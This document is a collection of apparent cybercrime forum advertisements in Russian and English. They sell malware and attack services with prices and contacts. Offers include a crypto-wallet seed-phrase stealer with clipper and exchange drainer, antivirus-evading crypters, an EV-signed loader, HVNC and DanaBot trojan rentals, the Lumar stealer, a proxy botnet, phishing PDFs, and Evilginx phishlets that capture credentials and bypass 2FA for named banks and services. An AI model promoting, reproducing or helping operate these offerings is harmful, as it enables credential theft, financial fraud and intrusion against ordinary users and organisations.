- We'll create any wallet you ask us for, extension or desktop.
- Desktop Wallets resizable and without resolution problem, you can minimize, maximize, and resize without problem
- Try Collect chrome extension wallets with their cruptographic addresses
- We provide an EV certificate depending on your subscription**
Spoiler: Currently Wallets?
Spoiler: Software Desktop
Exodus, Atomic, Guarda, Ledger, Trezor, BitBox, Daedalus, Wasabi, Coinomi, Monero GUI Wallet [multiple language] and Electrum
Spoiler: Extensions
Metamask**(Password, Chrome)** , Tronlink**(Password, Chrome)** , TrustWallet (Password, Chrome) , Crypto.com (Password, Chrome)
Spoiler: Exchanges & Sites
Binance (Chrome), Stake Casino (Chrome)
Spoiler: Do you need an Crypter?
Yeah
Spoiler: General Rules
We are not responsible for your Bots.
We are not responsible for your Data.
Work only with specific bots (Recommended).
We do not provide refunds after a completed deal.
We may terminate your lease if you break any rules.
We are not responsible for any of your losses related to the bot.
We are required to accept treatment through a guarantor at xss, in any
transaction.**
We provide a trial for 12h, during the xss guarantee for you to check
everything
We take care of assembling all the software for you.
We are obliged to help you with any problem that is possible.
We are obliged to guide you how to use the software if necessary**
Spoiler: PoC
Spoiler: Contact
PM: SCARLET
Jabber or Tox: in PM
XSS Guarantee accepted
Spoiler: RUS
Получите исходную фразу и пароль кошельков в Windows, а также Drain Crypto Exchange и многое другое.
Spoiler: Что вы получите при покупке?
**Незашифрованный 32-битный EXE-файл Dropper (размер 300 КБ), написанный на
C++.
Незашифрованные плагины (.exe | x64), написанный на C++.
Веб-панель c2 управления, сделанная на PHP
Программное обеспечение работает только в Windows 8/8.1, 10 или 11.
Я настраиваю программное обеспечение
Поддержка и обновления 24 часа **
Spoiler: Что ты делаешь?
**Цель состоит в том, чтобы обеспечить совместимость исходной фразы целевого аппаратного кошелька. Когда цель откроет свой кошелек, она увидит страницу- ловушку над целевым кошельком. перемещено, свернуто или закрыто. Пользователь не может закрыть обманную страницу, поскольку она будет появляться всегда. Целью этого является то, чтобы пользователь убедился, что его профиль кошелька был удален, и ему необходимо ввести свою исходную фразу, чтобы восстановить состояние кошелька.
Также получить пароли кошельков расширений браузера, только для конкретных
атак, а не для массового спама.
На данный момент у нас также есть функции крипто-обмена и крипто-клипера для
браузеров (хром), крипто-обмен работает путем замены адреса и QR-кода проверки
страницы, наш список доступных на данный момент страниц:
[BitRefill, Cryptomus, Fixfloat, G2A, HoodPay и Sellix]
Хотя наш криптоклипер сейчас также работает в (chrome) и на всех веб-сайтах,
когда пользователь копирует криптографический адрес, он будет заменен
назначенным вами адресом.
наш список валют: [BTC, ETH, BNB, TRX, LTC, SOL, DASH, DOGE, BCH, XMR, TON]
на данный момент также есть функция опустошения кошелька криптовалютной биржи
(Binance & Stake Казино)
Крипто-слив для бирж или веб-сайтов работает, когда пользователь осуществляет
вывод средств, все средства в его кошельке, а не только назначенный им фонд,
будут отправлены на ваш адрес.**
Spoiler: Наши возможности
**- Автоматический подсказчик слов bip39
- Работает на всех чистых системах без проблем
- Очень низкая загрузка процессора, не перегружает систему
- BIP 39 Проверка входных данных в режиме реального времени и при отгрузке и делает невозможным получение недействительной исходной фразы.
- В области получения паролей от кошельков расширений Chrome наша инъекция является постоянной и позволяет получать пароли без потерь.
- Поддержка нескольких кошельков одновременно
- У нас есть все необходимые шаблоны, вы можете запросить новый шаблон или кошелек по вашему выбору.
- Если у вас уже есть темы для кошелька, мы можем добавить их с доп. функции включены
- Чистая, красивая и простая в использовании панель управления с необходимым фильтром для комфортной работы
- Мы создадим любой кошелек по вашему запросу, расширение или рабочий стол.
- Размер настольных кошельков можно изменять, и без проблем с разрешением вы
можете без проблем свернуть, развернуть и изменить размер.
- Попробуйте собрать кошельки расширений Chrome с их криптографическими адресами.
- Мы предоставляем сертификат EV в зависимости от вашей подписки**
Spoiler: В настоящее время кошельки?
Spoiler: Программный рабочий стол
Exodus, Atomic, Guarda, Ledger, Trezor, BitBox, Daedalus, Wasabi, Coinomi, кошелек с графическим интерфейсом Monero [несколько языков] и Electrum
Spoiler: Расширения
Метамаска (пароль, Chrome), Tronlink (пароль, Chrome), TrustWallet (пароль, Chrome), Crypto.com (пароль, Chrome)
Spoiler: Биржи и сайты
Binance (Chrome), Stake Казино (Chrome)
Spoiler: Вам нужен криптер?
Ага
Spoiler: Основные правила
Мы не несем ответственности за ваших ботов.
Мы не несем ответственности за ваши Данные.
Работайте только с конкретными ботами (рекомендуется).
Мы не осуществляем возврат средств после завершения сделки.
Мы можем расторгнуть договор аренды, если вы нарушите какие-либо правила.
Мы не несем ответственности за любые ваши убытки, связанные с ботом.
Мы обязаны принять обращение через гаранта к xss в любой сделке.
Мы предоставляем пробную версию на 12 часов, во время xss гарантии, чтобы вы
все проверили.
Мы позаботимся о сборке всего программного обеспечения для вас.
Мы обязаны помочь Вам с любой возможной проблемой.
Мы обязаны научить вас, как использовать программное обеспечение, если это
необходимо.
Spoiler: PoC
Spoiler: Контакт
PM: SCARLET
qTox, Jabber в личку
Гарантия XSS принята
Spoiler: Тема закрыта из-за арбитража на Эксплойте
Brute Ratel 1.7.4 (latest version). Licensed.
Latest version of the top C2 tool designed specifically for EDR evasion. New post-exploitation techniques (advanced stomping, in-memory restoration of original buffer), new C2 fallback feature (more advanced than just using redirectors), etc. Tool is brand new and cannot be found anywhere else. The last time Brute Ratel came to be used was with an old 1.2 version - since 1.3 everything was completely rewritten and changed.
Contact with PM.
Вашей рассылке требуется идеальный путь в инбокс? Наш PDF лендинг приходит на помощь! Совмещая в себе привлекательную разводку и прямую ссылку на ваш контент, он обеспечивает автоматическую загрузку с одного клика в любом браузере.
Отправляйте информацию как индивидуально, так и широкой аудитории - для каждого клиента у нас есть индивидуальный подход.
Не беспокойтесь о деталях! Мы заботимся о всём: от дизайна письма до
оформления текста. Просто укажите привлекательный заголовок и приложите файл.
Выберите подходящую разводку и предоставьте ссылки на ваш контент, и мы
позаботимся о всем остальном.
Ваш контент без препятствий попадёт в инбокс любой почты! Благодаря
уникальному формату, где PDF содержит только изображение и ссылку, он уверенно
проходит сквозь фильтры благодаря своему узнаваемому и популярному формату.
Мы готовы создать PDF лендинг, адаптированный под любой сайт и
индивидуализированный для каждого клиента! Ваша уникальность в наших руках.
Примеры предоставляю по запросу по запросу.
Ваш идеальный контент начинается здесь!
Цены
PDF-файлы: 150$ за 999 размноженных файлов.
Недельная подписка: 600$ .
Инвестируйте в качество и индивидуальность!
Свяжитесь со мной:
Telegram: @LusiSup
Tox:
0101B013141C2B44C295F3717563E2F74DEF2FF621387FB981CBC611B622C2445238CFBFBA99
Prices
PDFs: $150 for 999 multiplied files.
Weekly subscription: $600 .
Invest in quality and individuality!
Contact me:
Telegram: @LusiSup
Tox:
0101B013141C2B44C295F3717563E2F74DEF2FF621387FB981CBC611B622C2445238CFBFBA99
Аренда HVNC:
собственная разработка
язык написания: чистый С
размер: < 100кБ
работает на win 7 - 11, х32/x64
нативный ЕХЕ/DLL, не требует зависимостей, дотнетов и рантаймов
не требует прав администратора
работа с браузерами: IE, Edge, Chrome, Firefox, Brave (браузеры работают
параллельно с пользовательскими, с копированием профиля - куки, кеш, local
storage и т.п.)
поддержка WebGL, Java
поддержка нескольких мониторов
опциональный автозапуск
опциональное добавление исключения Windows Defender
определение наличия на клиенте браузерных крипто кошельков (можно добавить
определение еще чего угодно)
отличия от известных аналогов: благодаря использованным техникам максимально
беспалевная для проактивок работа => максимальный отстук
не содержит в себе дополнительных компонентов (в отличии от аналогов), поэтому
легко криптуется
работа в т.ч. при запуске в системной сессиии
встроенный функционал просмотра и управления экраном пользователя (параллельно
с HVNC сессией)
выполнение команд в cmd у пользователя
загрузка файлов на клиент
загрузка и запуск EXE/DLL/JS/VBS/PS
софт использует кастомный протокол и соответственно кастомный viewer
есть web API в панели для автоматизации
цена: $2к в мес
возможен тест, от вас потребуется дедик
контакт:
amd64@xmpp.jp
BEE821CF6CB796E5B01A8D62A5BD084F99B66005B0AE1E3788350D7C7929DE2B963008611ECF
Депозит внесен, есть аналогичная тема и депозит на экспе.
GhostSocks - позволяет пользователям превратить "свою" сеть устройств в
частную, масштабируемую и управляемую SOCKS5 прокси-сеть.
Это идеальный вариант для тех, кто ищет эффективное, безопасное и экономичное
решение для управления большим пулом "устройств".
Почему Это Выгодно
Особенности
Техническая часть
Регистрация и оплата (BTC) подсписки на сайте -
Hidden content for authorized users.
- оплата любой другой валютой через суппорт
Цена за месяц:
PS
Стоит иметь в виду, что цена зависит от количества приобретаемых серверов, и
она пропорционально растет вместе с ними.
Обычно средний фактический онлайн в 3-5 раз меньше от вашего ОБЩЕГО количества
носков.
Runtime 15.10.23
- scanner.to
Hidden content for authorized users.
Контакты: telegram admin, личные сообщения на форуме
Spoiler
closed
ALL MAJOR BOTS / STEALERS SUPPORTED(can always contact to test another
software you want supported)
EACH STUB IS UNIQUE. NO STUBS ARE SOLD TO MULTIPLE CUSTOMERS
MAIN FEATURES
VERY long FUD time, with quick re-cleaning when needed
TOTALLY CLEAN ALL SCANTIME / RUNTIME / CLOUD / ON-DOWNLOAD
ALL INTENSE MEMORY SCANS FULLY BYPASSED FOR EVERY SOFTWARE
SMALL STUB SIZE (as low as 50kb)
32bit / 64bit Stubs
ALL Stubs can load x64/x86/all .NET, DOES NOT MATTER if the stub is 32bit or
64bit, they can all load anything
SUPPORT ALL .NET (32bit/64bit)
full fud on all runtime with remcos
THE STUB HAS NO DEPENDENCIES, ITS PURE C
REMCOS - ESET Premium Security 2023
REMCOS - Avast Internet Security 2023
REMCOS - Kaspersky Internet Security 2023
REMCOS - Windows Defender 2023
Basic functions:
x64/x86/all .NET files supported
icon support
multi-file binding support (execution on first run only or every run) GLUE
EXE + EXE
direct payload obfuscation
melt added (for static / EV)
ev builds can now self-install
diversity and quality of stubs improved significantly
pump options (correct file enlargement without detection)
clone certificate / clone version info / clone icon
Load method:
stealth: custom loading method is used which involves creating a new process
invisible: no process created, its a very stealthy loading method. only use if
stealth method is causing issues
Inject Target: this is the name of the windows process that will be injected
into (explorer.exe, cmd.exe, ftp.exe, certutil.exe, werfault.exe are all
valid)
Startup: Name: name of the installed .exe. Any name is valid
Startup: Directory Name: name of the directory that holds installed .exe
Startup: Directory Path: Path in Windows where startup is installed
Startup: Method: Method used to launch file with Windows
Single-instance
major changes:
- Persistence options added
- New startup method added (Task scheduler)
- Image data is now always in a valid PNG, so using professional sites like
photobucket/imageshack are fine to use
- Added ability to disable injection, so the payload loads very stealthy
inside an EV signed process (or static stub if you choose)
- Added Command Line Forwarding, now all command lines are forwarded
(including startup commandline)
minor changes:
- Now a mega.nz download link is provided for all stubs, so if a stub fails
to download on TOR, just download it manually and put it in the 'stubs' folder
(Link provided on the Stubs panel)
- Added a Low Entropy option for Pump Options. This allows the user to pump a
file with data which can be compressed heavily, preventing submission to
analysis services like virustotal without increasing the payload size
TEST INTERNET ON
Lumma https://scanner.to/result/ApMQahUdih
Vidar https://scanner.to/result/JLUufhGxVG
Remcos https://scanner.to/result/eOA9gF7hWe
loader Amadeus https://scanner.to/result/5nK3lj72Jt
EDR Amadeus https://scanner.to/result_EDR/aUx063tMzl
DanaBot https://scanner.to/result/fcC1IyPcoA
Remcos EDR https://scanner.to/result_EDR/VjLKHgHhtD
First 5 clients with 15+ reputation get free software for a test period of 2
days per review. Please write your requests to develop new features
Subscription price $3000 / month
feedback https://forum.exploit.in/topic/226528/
ALWAYS BYPASS WINDOWS DEFENDER, CLOUD IN SCANTIME, RUNTIME
BYPASS SMARTSCREEN
BYPASS GOOGLECHROME
**Обновленная версия трояна DanaBot. (Аренда) / Updated version of the DanaBot Trojan. (Rent)
Аренда в месяц / Rent per month**
Stealer + HVNC = 1000$
Stealer + PostGrabber = 1000$
Stealer + PostGrabber + HVNC = 1500$
Stealer + PostGrabber + HVNC + API + Testing System + Personal Support = 3000$
Stealer + PostGrabber + HVNC + API + Testing System + Personal Support +
Personal Server = (по договоренности / by agreement)
Demo 7 Day (Stealer+HVNC+PostGrabber) = 500$
Spoiler: Неактуальный тариф
Demo 7 Day (Stealer+HVNC+PostGrabber) = 500$
Бот / Bot
Стиллер (FF,OP,CH,IE,EG).
Пост граббер (EG,FF,OP,CH,IE)
Инжекты HTML с расширенным форматом Zeus.
HVNC - скрытый рабочий стол.
Запись видео, процессы, сайты.
Клавиатурный шпион.
Перехват Буфера обмена.
Редиректы веб запросов.
Блокировка веб запросов.
Система оповещения в жаббер при событиях, сайты, процессы, автоматическое
включение функции HVNC.
Система офлайн работы с файлами. (граббер кошельков).
Просмотр экрана, cmd, управление процессами.
Восстановление инфоормации о прокси серверах через ТОР.
Stealer (FF,OP,CH,IE,EG).
Post grabber (EG,FF,OP,CH,IE)
HTML injections with extended Zeus format including internal variables and bot
information.
HVNC is a hidden desktop.
Video recording, processes, sites.
Keyboard spy.
Interception of the Clipboard.
Redirects of web requests.
Blocking web requests.
Jabber notification system for events, sites, processes, automatic activation
of the HVNC function.
Offline file management system. (wallet grabber).
Screen view, cmd, process management.
Restoring information about proxy servers via TOR.
Сервер / Server
Система генерации билдов.
Автокрипт. (NO/FUD)
Система построения цепочки прокси (+Тор) автопроверка. Софт для проксирования.
Система API для подключения ваших крипторов, баз данных.
Встроенный Фаервол.
Build generation system.
Autocrypt. (NO/FUN)
The system of building a proxy chain (+Tor) auto-check. Software for design.
API system for connecting your cryptors, databases.
Built-in Firewall.
Программа клиент для управления / Client
Панель для работы с данными в виде ехе приложения для windows.
Возможность управления ботами в офлайн режиме.
Система экспорта слепка бота (Браузер, куки, сохранные пароли, версия
операционной системы).
Быстрая и удобная обработка большого объема данных, парсер данных.
Многоформатный Экспорт данных.
Режим чтения логов без возможности управлять системой (для сотрудников).
A panel for working with data in the form of an exe application for windows.
The ability to manage bots in offline mode.
The bot's impression export system (Browser, cookies, saved passwords,
operating system version).
Fast and convenient processing of a large amount of data, data parser.
Multi-format Data export.
Log reading mode without the ability to manage the system (for employees).
Сервер для работы с ботом на прямую / Online Server
Панель для работы в онлайн режиме в виде ехе приложения для windows.
Поддержка Socks5 сервера. (+API)
Прокидка портов.
Информация о процессах.
Удаленная командная строка.
Удаленная работа с файлами, сетевыми ресурсами.
HVNC Скрытый рабочий стол.
Просмотр экрана пользователя.
Онлайн Стиллер.
A panel for working in online mode in the form of an exe application for
windows.
Socks5 server support. (+API)
Port forwarding.
Information about processes.
Remote command prompt.
Remote work with files, network resources.
HVNC is a hidden desktop.
Viewing the user's screen.
Online Stealer.
Готовы предоставить ограниченное количетсво слотов. В зависимости от ситуации
в аренде может быть отказанно.
We are ready to provide a limited number of slots. Depending on the situation,
the lease may be refused.
Общие правила / General rules
Мы не несем ответственности за ваши сервера / We are not responsible for your
servers.
Мы не несем ответственности за ваших ботов / We are not responsible for your
bots.
Мы не несем ответственности за ваши данные / We are not responsible for your
data.
Мы не несем ответственности за работу функций софта при определенных условиях
/ We are not responsible for the operation of the software functions under
certain conditions.
Мы не несем ответственности за чистки и отстук / We are not responsible for
cleaning and cleaning.
Мы не несем ответственности за любые ваши убытки связанные с ботом / We are
not responsible for any of your losses related to the bot.
Мы не делаем возврат средств / We do not make refunds.
Мы может отказать в аренде / We may refuse to rent.
Мы обязуемся после оплаты предоставить и настроить вам ПО DanaBot / We undertake to provide and configure the software DanaBot for you after payment
Связь / Contacts
PM: DanaBot
Jabber: dana.project@exploit.im
(OTR/PGP)
Tox:
15C934325F271C7F7385E27EE34EEB529BA1F705DFDE56228F0D990CF5360B4D20807021A6C7
Spoiler: Неактуальный контакт
8434A6B077490F223410490223A53A763362A1F32109CEE7BCEDD838B76CA23AC50B76AC8175
Support / Поддержка
Jabber: danasupport@exploit.im
Telegram: @danabotsup
ТОР-Сайт / Tor-Site
http://danabotohqbkiuz2kmsgcbaa5yunlsgbe2zqgmq5u5qwd2mxjs76feid.onion
Обзор панели / Panel Review
https://forum.exploit.in/topic/205242/
Прошлые версии / Previous version
v1 = https://forum.exploit.in/topic/94304/
v2 = https://forum.exploit.in/topic/202727/
****
LOADER + EV VALID CERTIFICATE [payment only for working days of the file]
Наши преимущества: Вы платите только тогда когда наша услуга оказана полностью на 100%
● Любые иконки, название
● Подкачка любого оригинального софта по вашей прямой ссылке
● Полный обход Smart Screen
● Полный обход Google Chrome
● Полный обход Edge
● Полный обход Windows Defender
● Защита от VirusTotal
● Доверенный UAC
● Свои сервера / домены
Дополнительно:
● Блокировка повторного запуска
● Автоматическая замена вашего exe
● Статистика запусков
● Автоматическая мутация вашего ехе
Важно:
● Название правообладателя сертификата не выбирается
● Со временем детекты могут "налипать" делаем чистки
● Гарантию даём только за валидный сертификат + WD
● Проверка работоспособности сразу после выдачи
● Бесплатных тестов не делаем, условия приобретения могут изменяться
● Можем отказать в услуге, без объяснения причин
Стоимость:
● EXE+EV sign, any size - 358$/день/day
Продажа осуществляется неделями/Sale only for 1 weeks
или/or 2506$/week
Дополнительно:
● SALE EV SIGN 2500$
P.S. Только недельные подписки, тестов нет. Постоянным клиентам скидки
Spoiler: В случае возникновения проблем с сертификатом или файлом
Если сертификат отзывают или файл перестаёт быть доверенным, возвращаем не использованную часть подписки. Например, спустя 72 часа отзывают сертификат или файл перестаёт быть доверенным, возврат средств будет происходить по формуле:
2506$ (изначальная оплата за неделю использования) - 358$ (стоимость одного дня) * 3 (использованные дни) = 1432$ к вашему возврату
Возврат за EV SIGN после полной передачи не предусмотрен
Для оформления заказа - https://t.me/D3Fuck_Loader_newbot
Устал от постоянных
соседей в логах?
Тогда мы знаем,как тебе
помочь️
Обладает набором базовых функций хорошего стиллера, а именно:
0. Сбор данных (пароли, куки, автозаполнения, карты) со всех Chromium и Gecko
(x86-x64) based браузеров
1. Граббер Telegram-сессий (точечный поиск и поиск по дискам)
2. Сбор файлов с рабочего стола
3. Сбор 2FA программ и расширений
4. Рекурсивный поиск wallet.dat и сбор больше чем 30и программ/расширений
крипто-кошельков
5. Сбор статистики о жертве
6.Возможность установки отдельного прокладочного сервера.
7.Извлекание паролей со всех логов
8.Система меток
Все настройки уже сделаны за Вас нашими специалистами, Вам останется лишь
зайти в панель и начать использование продукта.
Так же стоит выделить bulletproof сеть доставки лога.
Для каждого клиента мы создаем независимый от других клиентов шлюз.
А еще, не можем не похвастаться нашей разработкой - Анти-конкурентность
После того, как Lumar сработал на устройстве, другие стиллеры не смогут
собрать криптокошельки с этого же устройства. Ваша жертва останется только на
Вашей удочке!
Цена 150$
TG @lumar_stealer
Канал с новостями https://t.me/lumar_project
Hey, I'm providing high-quality private software/malware/exploit installation services to my customers for their needs.
I can setup your botnets, stealers, c2, RAT or any of your request.
Also I'm hardening security of the servers that you wanna use for this. I'm
frequently online and I can run your stealer, RAT, botnet in your or my
servers.
I have more than 15 years experience, just tell me what you need and lets
discuss the price.
Note: I'm not selling botnets. I'm building it for you and also I can operate it if you want me to do so.
Contact me on
PM.
We can chat details on Telegram or XMPP if you'd prefer.
Note: Escrow/Guarantor Always Accepted.
Best Regards
Telegram: @zzipfile
RU УСЛУГИ КРИПТОВАНИЯ
Дополнительные возможности
Условия
Цена: $20
по факту выполнения
BTC, QIWI, WebMoney, PerfectMoney
15-30 минут
EN ENCRYPTION SERVICE
Additional options
ToS
Price: $20
after the work is done
BTC, QIWI, WebMoney, PerfectMoney
15-30 min
Telegram: @zzipfile
================
Deposit 500USD [Exploit]
Evilginx Phishlets**: Реверс-прокси решения для кражи учетных данных и обхода 2FA — идеально подходит для продвинутых фишинговых наборов! (Evilginx Phishlets: Reverse Proxy Solutions for Stealing Credentials & Bypassing 2FA – Perfect for Advanced Phishing Kits! )
Продукт (Product):
Источник (Source): Продается проверенный и улучшенный кастомный Evilginx с
phishlets, включая Telegram Notification Module и усовершенствования в
области безопасности. (Verified and enhanced custom Evilginx with phishlets,
including Telegram Notification Module and security improvements.)
Поддержка (Support):
Вы получите видеоинструкции и текстовые руководства по установке и
настройке. (You will receive video tutorials and text guides for setup and
installation.)
Phishlets могут быть настроены индивидуально по вашим требованиям. (Phishlets can be customized based on your requirements.)
Функции (Features):
Автоматическое уведомление в Telegram о каждом входе в систему. (Automatic
Telegram notification for each login.)
Защита от повторного использования сессий с улучшенными механизмами
безопасности. (Protection against session reuse with enhanced security
mechanisms.)
Полный live тест доступен для проверенных аккаунтов и после эскроу. (Full live
test available for verified accounts and after escrow.)
Преимущества (Benefits):
- Легкая интеграция и быстрая настройка. (Easy integration and quick setup.)
- Обход 2FA и захват cookie/токенов. (Bypass 2FA and capture cookies/tokens.)
- Доступно подробное руководство с инструкциями. (Detailed guide with
instructions available.)
LinkedIn: $5k ( evilpuppet )
Веб-сайт: www.linkedin.com (URL:
www.linkedin.com)
Ссылка для входа: https://www.linkedin.com/login (Login URL:
https://www.linkedin.com/login)
Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Intuit: $3k
Веб-сайт: www.intuit.com (URL:
www.intuit.com)
Ссылка для входа: https://accounts.intuit.com/index.html (Login URL:
https://accounts.intuit.com/index.html)
Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Telegram: $3k
Веб-сайт: www.telegram.org (URL:
www.telegram.org)
Ссылка для входа: https://my.telegram.org/auth (Login URL:
https://my.telegram.org/auth)
Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Yahoo + AOL: $5k
Веб-сайты: www.yahoo.com,
www.aol.com (Websites:
www.yahoo.com, www.aol.com)
Ссылки для входа: https://login.yahoo.com, https://login.aol.com (Login
URLs: https://login.yahoo.com, https://login.aol.com)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
iCloud: $2.5k
Веб-сайт: www.icloud.com (URL:
www.icloud.com)
Ссылка для входа: https://www.icloud.com (Login URL:
https://www.icloud.com)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Google (Gmail + Google Services): $6.5k EvilPlaywright (evilpuppet)
Веб-сайт: www.google.com (URL:
www.google.com)
Ссылка для входа: https://accounts.google.com/signin (Login URL:
https://accounts.google.com/signin)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
GitHub: $1k
Веб-сайт: www.github.com (URL:
www.github.com)
Ссылка для входа: https://github.com/login (Login URL:
https://github.com/login)
Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Office365: $2k (также включает Okta и GoDaddy)
Веб-сайты: www.office.com,
www.okta.com, www.godaddy.com
(Websites: www.office.com,
www.okta.com,
www.godaddy.com)
Ссылки для входа: https://login.microsoftonline.com,
https://www.okta.com/login, https://sso.godaddy.com/login (Login URLs:
https://login.microsoftonline.com, https://www.okta.com/login,
https://sso.godaddy.com/login)
Захват электронной почты/имени пользователя и пароля. Обход 2FA и захват
cookie/токенов. Логи отправляются в Telegram.
(Capture email/user and password. Bypass 2FA and capture cookies/tokens. Logs
are sent to Telegram.)
Outlook: $1k
Веб-сайт: www.outlook.com (URL:
www.outlook.com)
Ссылка для входа: https://outlook.live.com/owa/ (Login URL:
https://outlook.live.com/owa)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Airbnb: $1k
Веб-сайт: www.airbnb.com (URL:
www.airbnb.com)
Ссылка для входа: https://www.airbnb.com/login (Login URL:
https://www.airbnb.com/login)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Salesforce: $1k
Веб-сайт: www.salesforce.com (URL:
www.salesforce.com)
Ссылка для входа: https://login.salesforce.com (Login URL:
https://login.salesforce.com)
Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Amazon.com: $2k
Веб-сайт: www.amazon.com (URL:
www.amazon.com)
Ссылка для входа: https://www.amazon.com/ap/signin (Login URL:
https://www.amazon.com/ap/signin)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Facebook: $2k
Веб-сайт: www.facebook.com (URL:
www.facebook.com)
Ссылка для входа: https://www.facebook.com/login (Login URL:
https://www.facebook.com/login)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Instagram: $2k
Веб-сайт: www.instagram.com (URL:
www.instagram.com)
Ссылка для входа: https://www.instagram.com/accounts/login/ (Login URL:
https://www.instagram.com/accounts/login/)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Azure.com: $3k
Веб-сайт: www.azure.com (URL:
www.azure.com)
Ссылка для входа: https://portal.azure.com (Login URL:
https://portal.azure.com)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
AWS.amazon.com: $3k
Веб-сайт: aws.amazon.com (URL: aws.amazon.com)
Ссылка для входа: https://signin.aws.amazon.com/signin (Login URL:
https://signin.aws.amazon.com/signin)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Ads.microsoft.com: $3k
Веб-сайт: ads.microsoft.com (URL: ads.microsoft.com)
Ссылка для входа: https://ads.microsoft.com/login (Login URL:
https://ads.microsoft.com/login)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Mobile.de: $5k
Веб-сайт: www.mobile.de (URL:
www.mobile.de)
Ссылка для входа: https://www.mobile.de/login (Login URL:
https://www.mobile.de/login)
Захват электронной почты и пар
пароля. Обход 2FA и захват cookie/токенов. Логи отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Autoscout24: $5k
Веб-сайт: www.autoscout24.com (URL:
www.autoscout24.com)
Ссылка для входа: https://www.autoscout24.com/login (Login URL:
https://www.autoscout24.com/login)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Blockchain.com: $5k (JS Inject MODULE + $1k)
Веб-сайт: www.blockchain.com (URL:
www.blockchain.com)
Ссылка для входа: https://login.blockchain.com (Login URL:
https://login.blockchain.com)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Binance.com: $6k
Веб-сайт: www.binance.com (URL:
www.binance.com)
Ссылка для входа: https://accounts.binance.com/en/login (Login URL:
https://accounts.binance.com/en/login)
Захват электронной почты и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture email and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Wells Fargo: $5k
Веб-сайт: www.wellsfargo.com (URL:
www.wellsfargo.com)
Ссылка для входа: https://connect.secure.wellsfargo.com/auth/login/present
(Login URL: https://connect.secure.wellsfargo.com/auth/login/present)
Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Citi: $5k
Веб-сайт: www.citi.com (URL:
www.citi.com)
Ссылка для входа: https://online.citi.com/US/login.do (Login URL:
https://online.citi.com/US/login.do)
Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Bank of America (Bofa): $5k
Веб-сайт: www.bankofamerica.com (URL:
www.bankofamerica.com)
Ссылка для входа: <https://secure.bankofamerica.com/login/sign-
in/signOnV2Screen.go> (Login URL:
https://secure.bankofamerica.com/login/sign-in/signOnV2Screen.go)
Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Chase: $5k
Веб-сайт: www.chase.com (URL:
www.chase.com)
Ссылка для входа: https://secure01a.chase.com/web/auth/logonbox (Login URL:
https://secure01a.chase.com/web/auth/logonbox)
Захват имени пользователя и пароля. Обход 2FA и захват cookie/токенов. Логи
отправляются в Telegram.
(Capture user and password. Bypass 2FA and capture cookies/tokens. Logs are
sent to Telegram.)
Scotiabank Canada: $4k
Веб-сайт: www.scotiabank.com (URL:
www.scotiabank.com)
Ссылка для входа: https://www.scotiaonline.scotiabank.com (Login URL:
https://www.scotiaonline.scotiabank.com)
